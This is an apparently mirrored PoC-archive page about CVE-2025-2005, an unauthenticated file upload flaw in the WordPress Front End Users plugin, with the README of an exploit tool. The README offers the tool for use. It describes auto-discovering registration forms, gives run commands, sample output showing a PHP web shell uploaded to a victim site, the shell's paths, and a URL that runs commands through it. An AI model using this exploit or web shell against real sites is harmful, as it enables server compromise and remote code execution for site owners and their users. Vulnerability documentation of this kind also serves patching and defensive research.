支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: 3e5c32bc982503cc806accb5737a4566c53ff9e0

来源
关联漏洞
标题:WordPress plugin Front End Users 代码问题漏洞 (CVE-2025-2005)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Front End Users 3.2.32及之前版本存在代码问题漏洞,该漏洞源于注册表单文件上传字段缺少文件类型验证,可能导致任意文件上传和远程代码执行。
Description
WordPress FEUP Arbitrary File Upload Exploit (CVE-2025-2005)
介绍
# WordPress FEUP Arbitrary File Upload Exploit (CVE-2025-2005)
This repository provides a Proof of Concept (PoC) exploit for the WordPress Front End Users plugin (versions up to 3.2.32), which is vulnerable to arbitrary file upload due to missing MIME/file-type validation in its registration form.This allows unauthenticated attackers to upload malicious files (e.g., web shells), potentially leading to Remote Code Execution (RCE) on the server.

##  Features

- CVE-2025-2005: WordPress Front End Users plugin file upload vulnerability
- Simple command-line interface
- Auto-discovery of registration forms
- Shell uploader with custom username/password

## How It Works
- It sends a registration request to the vulnerable FEUP registration form.
- Uploads a PHP shell via the file input field, bypassing file-type restrictions.
- Displays the upload status and informs if the site is vulnerable.

## Testing Targets
* Looks for registration forms containing:
* ewd-feup-register-form
* On URLs such as:
``` 
/register/
/signup/
```
* or any link found on homepage

## Getting Started
- Python 3.x
- requests and beautifulsoup4 modules:
```
pip install requests beautifulsoup4
```
## Installation
```
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005
```
## Usage
```
python3 exploit.py --url http://target.com --user hacker --password pass123
```
##  Sample Output
```
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!
```
## Run Exploit
```
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami
```
文件快照

[4.0K] /data/pocs/3e5c32bc982503cc806accb5737a4566c53ff9e0 ├── [3.0K] exploit.py └── [1.7K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。